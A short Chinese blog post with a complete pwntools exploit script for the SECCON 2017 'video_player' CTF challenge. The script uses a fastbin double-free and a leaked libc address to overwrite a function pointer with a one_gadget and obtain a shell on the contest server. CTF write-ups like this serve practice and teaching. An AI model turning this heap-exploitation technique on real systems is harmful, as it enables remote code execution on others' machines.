zoukankan      html  css  js  c++  java

  • Seccon2017-pwn500-video_player

      感觉这个题目并不值500分,有些地方比较牵强,漏洞也比较明显,解题方法有多种,出题者把堆的布局随机化了,不过使用fastbin doublefree的话,可以完全忽视被打乱的堆

      1 from pwn import *
  2 #context.log_level='debug'
  3 #wah
  4 def newaudioclip(r, bitrate, length, data, description):
  5     r.recvuntil('>>> ')
  6     r.sendline('1')
  7     r.recvuntil('>>> ')
  8     r.sendline('2')
  9     r.recvuntil('Audio Bitrate : ')
 10     r.send(bitrate)
 11     r.recvuntil('Audio Length (seconds) : ')
 12     r.send(length)
 13     r.recvuntil('Audio Data : ')
 14     r.send(data)
 15     r.recvuntil('Add description : ')
 16     r.send(description)
 17 
 18 def newvideoclip(r, rs, fps, num, data, description):
 19     r.recvuntil('>>> ')
 20     r.sendline('1')
 21     r.recvuntil('>>> ')
 22     r.sendline('1')
 23     r.recvuntil('Video Resolution : ')
 24     r.send(rs)
 25     r.recvuntil('FPS : ')
 26     r.send(fps)
 27     r.recvuntil('Number of Frames : ')
 28     r.send(num)
 29     r.recvuntil('Video Data : ')
 30     r.send(data)
 31     r.recvuntil('Add description : ')
 32     r.send(description)
 33 
 34 def newmetadataclip(r, date, owner):
 35     r.recvuntil('>>> ')
 36     r.sendline('1')
 37     r.recvuntil('>>> ')
 38     r.sendline('4')
 39     r.recvuntil('Date of Creation : ')
 40     r.send(date)
 41     r.recvuntil('Owner of video : ')
 42     r.send(owner)
 43 
 44 
 45 def editvideoclip(r, inx, rs, fps, num, data, description):
 46     r.recvuntil('>>> ')
 47     r.sendline('2')
 48     r.recvuntil('Enter index : ')
 49     r.sendline(inx)
 50     r.recvuntil('Video Resolution : ')
 51     r.send(rs)
 52     r.recvuntil('FPS : ')
 53     r.send(fps)
 54     r.recvuntil('Number of Frames : ')
 55     r.send(num)
 56     r.recvuntil('Video Data : ')
 57     r.send(data)
 58     r.recvuntil('Edit description : ')
 59     r.send(description)
 60 
 61 def delclip(r, inx):
 62     r.recvuntil('>>> ')
 63     r.sendline('4')
 64     r.recvuntil('Enter index : ')
 65     r.sendline(inx)
 66 
 67 close = 0
 68 def playvideoclip(r, inx):
 69     global close
 70     r.recvuntil('>>> ')
 71     r.sendline('3')
 72     r.recvuntil('Enter index : ')
 73     r.sendline(inx)
 74     r.recvuntil('Playing video...
')
 75     tmp8 = r.recv(8)
 76     final8 = ''
 77     for i in range(0, 8):
 78         final8 += chr(ord(tmp8[i])^0xcc)
 79     close = u64(final8)
 80     print('leaked close is %x'%close)
 81 
 82 chunk = 0
 83 def playvideoclip1(r, inx):
 84     global chunk
 85     r.recvuntil('>>> ')
 86     r.sendline('3')
 87     r.recvuntil('Enter index : ')
 88     r.sendline(inx)
 89     r.recvuntil('Playing video...
')
 90     tmp8 = r.recv(8)
 91     final8 = ''
 92     for i in range(0, 8):
 93         final8 += chr(ord(tmp8[i])^0xcc)
 94     chunk = u64(final8)
 95     print('leaked chunk is %x'%chunk)
 96 
 97 def playvideoclip2(r, inx):
 98     r.recvuntil('>>> ')
 99     r.sendline('3')
100     r.recvuntil('Enter index : ')
101     r.sendline(inx)
102     
103 if 0:
104     ip = '127.0.0.1'
105     port  = 10001
106 else:
107     ip = 'video_player.pwn.seccon.jp'
108     port  = 7777
109 
110 def getpid():
111     import time
112     exe = 'video_player'
113     time.sleep(0.1)
114     pid= pwnlib.util.proc.pidof(exe)
115     print pid
116     raw_input('go!')
117 
118 def pwnpwn():
119     r = remote(ip, port)
120     r.recvuntil('What is your movie name?')
121     getpid()
122     r.send('x00'*0xff)
123     #newaudioclip(r, bitrate, length, data, description):
124     newaudioclip(r, p16(30), p32(0x50), 'x00', 'x00')
125     #1
126     newvideoclip(r, p64(0), p32(0), p32(0x30), 'x00', 'x00')
127     editvideoclip(r, '1', p64(0), p32(0), p32(0x50), 'x00', 'x00')
128 
129     delclip(r, '0')
130     delclip(r, '1')
131     
132     #2
133     newvideoclip(r, p64(0), p32(0), p32(0x50), 'x00', 'x00')
134 
135     data = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x00604028)
136     editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data, 'x00')
137     playvideoclip(r, '2') 
138 
139     #3
140     close_offset = 0xF78B0
141     binsh_offset = 0x18CD17
142     system_offset = 0x45390
143     one_gadget_offset = 0xf1117
144     binsh = close - close_offset + binsh_offset
145     system = close - close_offset + system_offset
146     one_gadget = close - close_offset + one_gadget_offset
147     data1 = p64(0)*2+p64(one_gadget)
148     newmetadataclip(r, data1, 'x00'*0x1f)
149 
150     data2 = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x0000000000604400+3*8)
151     editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data2, 'x00')
152     playvideoclip1(r, '2') 
153 
154     raw_input('here')
155     data3 = p64(chunk)
156     editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data3, 'b'*0x2f)
157     playvideoclip2(r, '2') 
158     r.interactive()
159 
160 pwnpwn()
  • 相关阅读:
    hiho47 : 拓扑排序·一
    Excel 曝Power Query安全漏洞
    分布式系统技术:存储之数据库
    队列应用
    20155239《Java程序设计》实验一(Java开发环境的熟悉)实验报告
    打印Java main方法执行的命令参数代码
    nothing to commit, working tree clean Remote "origin" does not support the LFS locking API. Consider disabling it with:
    异步
    字节跳动杨震原:A/B测试不是万能的,但不会一定不行
    集成显卡 独显
  • 原文地址:https://www.cnblogs.com/wangaohui/p/8022538.html
Copyright © 2011-2022 走看看